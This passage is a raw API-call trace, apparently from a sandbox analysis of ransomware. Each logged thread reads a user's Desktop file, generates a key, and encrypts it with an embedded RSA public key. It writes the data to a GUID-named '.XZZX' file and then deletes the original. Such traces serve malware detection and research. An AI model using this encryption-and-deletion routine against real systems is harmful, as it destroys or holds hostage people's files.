(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\zd0bLbxkM-mx4VZDX_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\zd0blbxkm-mx4vzdx_.flv")) returned 0 Thread: id = 591 os_tid = 0x614 [0171.560] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.560] lstrcpyW (in: lpString1=0x29af460, lpString2="8P6C FwpZ.mkv" | out: lpString1="8P6C FwpZ.mkv") returned="8P6C FwpZ.mkv" [0171.560] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0171.560] SetErrorMode (uMode=0x1) returned 0x1 [0171.560] lstrcpyW (in: lpString1=0x29af860, lpString2="8P6C FwpZ.mkv" | out: lpString1="8P6C FwpZ.mkv") returned="8P6C FwpZ.mkv" [0171.560] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x787d5ab3, Data2=0xb822, Data3=0x4f81, Data4=([0]=0xa5, [1]=0x34, [2]=0x50, [3]=0x10, [4]=0xf4, [5]=0xcb, [6]=0x8c, [7]=0x1c))) returned 0x0 [0171.560] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8P6C FwpZ.mkv") returned 99 [0171.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0171.560] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\19D6B3C6392F4722787D5AB33BCA2B6A.XZZX") returned 123 [0171.561] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="XZZX") returned 0x0 [0171.561] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8P6C FwpZ.mkv", dwFileAttributes=0x20) returned 1 [0171.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8P6C FwpZ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\8p6c fwpz.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa18 [0171.561] ReadFile (in: hFile=0xa18, lpBuffer=0x43ae728, nNumberOfBytesToRead=0x2b71, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43ae728*, lpNumberOfBytesRead=0x29ae418*=0x2b71, lpOverlapped=0x0) returned 1 [0171.562] CloseHandle (hObject=0xa18) returned 1 [0171.562] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0171.563] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0171.563] SetErrorMode (uMode=0x1) returned 0x1 [0171.563] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0171.563] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a6240) returned 1 [0171.565] CryptGenKey (in: hProv=0x43a6240, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cdea98) returned 1 [0171.739] CryptExportKey (in: hKey=0x3cdea98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0171.739] CryptExportKey (in: hKey=0x3cdea98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0171.739] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.739] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0171.739] CryptDestroyKey (hKey=0x3cdea98) returned 1 [0171.739] CryptReleaseContext (hProv=0x43a6240, dwFlags=0x0) returned 1 [0171.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\19D6B3C6392F4722787D5AB33BCA2B6A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\19d6b3c6392f4722787d5ab33bca2b6a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa18 [0171.740] WriteFile (in: hFile=0xa18, lpBuffer=0x43ae728*, nNumberOfBytesToWrite=0x2b71, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43ae728*, lpNumberOfBytesWritten=0x29ae438*=0x2b71, lpOverlapped=0x0) returned 1 [0171.740] SetFilePointer (in: hFile=0xa18, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b71 [0171.740] WriteFile (in: hFile=0xa18, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.740] SetFilePointer (in: hFile=0xa18, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b76 [0171.740] WriteFile (in: hFile=0xa18, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x1a, lpOverlapped=0x0) returned 1 [0171.740] SetFilePointer (in: hFile=0xa18, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b90 [0171.740] WriteFile (in: hFile=0xa18, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.740] SetFilePointer (in: hFile=0xa18, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b95 [0171.741] SetErrorMode (uMode=0x1) returned 0x1 [0171.741] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0171.741] OutputDebugStringW (lpOutputString="end") [0171.741] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0171.741] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0171.741] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a6240) returned 1 [0171.741] CryptImportPublicKeyInfo (in: hCryptProv=0x43a6240, dwCertEncodingType=0x1, pInfo=0x43a3340*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a3370*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a3378*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3cdebd8) returned 1 [0171.741] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.742] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0171.742] CryptEncrypt (in: hKey=0x3cdebd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0171.742] CryptEncrypt (in: hKey=0x3cdebd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a62c8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a62c8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0171.742] WriteFile (in: hFile=0xa18, lpBuffer=0x43a62c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a62c8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0171.742] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0171.742] WriteFile (in: hFile=0xa18, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.742] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0171.742] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0171.742] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0xa24) returned 0x0 [0171.742] RegQueryValueExW (in: hKey=0xa24, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x10a, lpcbData=0x29adfdc*=0x4) returned 0x0 [0171.742] RegCloseKey (hKey=0xa24) returned 0x0 [0171.742] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0xa24) returned 0x0 [0171.742] RegSetValueExW (in: hKey=0xa24, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x10b, cbData=0x4 | out: lpData=0x29adfec*=0x10b) returned 0x0 [0171.742] RegCloseKey (hKey=0xa24) returned 0x0 [0171.742] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.743] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.743] CloseHandle (hObject=0xa18) returned 1 [0171.743] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0171.743] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0171.743] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8P6C FwpZ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\8p6c fwpz.mkv")) returned 1 [0171.744] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8P6C FwpZ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\8p6c fwpz.mkv")) returned 0 Thread: id = 592 os_tid = 0x6d4 [0171.887] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.887] lstrcpyW (in: lpString1=0x29af460, lpString2="8W8bO.gif" | out: lpString1="8W8bO.gif") returned="8W8bO.gif" [0171.887] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0171.887] SetErrorMode (uMode=0x1) returned 0x1 [0171.887] lstrcpyW (in: lpString1=0x29af860, lpString2="8W8bO.gif" | out: lpString1="8W8bO.gif") returned="8W8bO.gif" [0171.887] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x29643033, Data2=0xb595, Data3=0x4024, Data4=([0]=0x81, [1]=0x4a, [2]=0xf1, [3]=0x14, [4]=0x8d, [5]=0xf2, [6]=0x17, [7]=0x6))) returned 0x0 [0171.887] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8W8bO.gif") returned 95 [0171.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0171.887] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\ED641CAF2D7EC8F4296430333019AD3C.XZZX") returned 123 [0171.887] StrStrW (lpFirst="8W8bO.gif", lpSrch="XZZX") returned 0x0 [0171.887] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8W8bO.gif", dwFileAttributes=0x20) returned 1 [0171.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8W8bO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\8w8bo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa20 [0171.888] ReadFile (in: hFile=0xa20, lpBuffer=0x43ae728, nNumberOfBytesToRead=0x2aea, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43ae728*, lpNumberOfBytesRead=0x29ae418*=0x2aea, lpOverlapped=0x0) returned 1 [0171.889] CloseHandle (hObject=0xa20) returned 1 [0171.889] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0171.889] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0171.889] SetErrorMode (uMode=0x1) returned 0x1 [0171.889] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0171.889] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a6350) returned 1 [0171.891] CryptGenKey (in: hProv=0x43a6350, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cdea98) returned 1 [0172.226] CryptExportKey (in: hKey=0x3cdea98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0172.226] CryptExportKey (in: hKey=0x3cdea98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0172.226] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0172.226] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0172.226] CryptDestroyKey (hKey=0x3cdea98) returned 1 [0172.226] CryptReleaseContext (hProv=0x43a63d8, dwFlags=0x0) returned 0 [0172.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\ED641CAF2D7EC8F4296430333019AD3C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\ed641caf2d7ec8f4296430333019ad3c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa28 [0172.227] WriteFile (in: hFile=0xa28, lpBuffer=0x43ae728*, nNumberOfBytesToWrite=0x2aea, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43ae728*, lpNumberOfBytesWritten=0x29ae438*=0x2aea, lpOverlapped=0x0) returned 1 [0172.227] SetFilePointer (in: hFile=0xa28, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2aea [0172.227] WriteFile (in: hFile=0xa28, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0172.227] SetFilePointer (in: hFile=0xa28, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2aef [0172.227] WriteFile (in: hFile=0xa28, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x12, lpOverlapped=0x0) returned 1 [0172.227] SetFilePointer (in: hFile=0xa28, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b01 [0172.228] WriteFile (in: hFile=0xa28, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0172.228] SetFilePointer (in: hFile=0xa28, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b06 [0172.228] SetErrorMode (uMode=0x1) returned 0x1 [0172.228] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0172.228] OutputDebugStringW (lpOutputString="end") [0172.228] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.228] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0172.228] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a6460) returned 1 [0172.228] CryptImportPublicKeyInfo (in: hCryptProv=0x43a6460, dwCertEncodingType=0x1, pInfo=0x43a34e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a3510*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a3518*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3cdea98) returned 1 [0172.228] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0172.229] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0172.229] CryptEncrypt (in: hKey=0x3cdea98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0172.229] CryptEncrypt (in: hKey=0x3cdea98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a64e8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a64e8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0172.229] WriteFile (in: hFile=0xa28, lpBuffer=0x43a64e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a64e8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0172.229] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 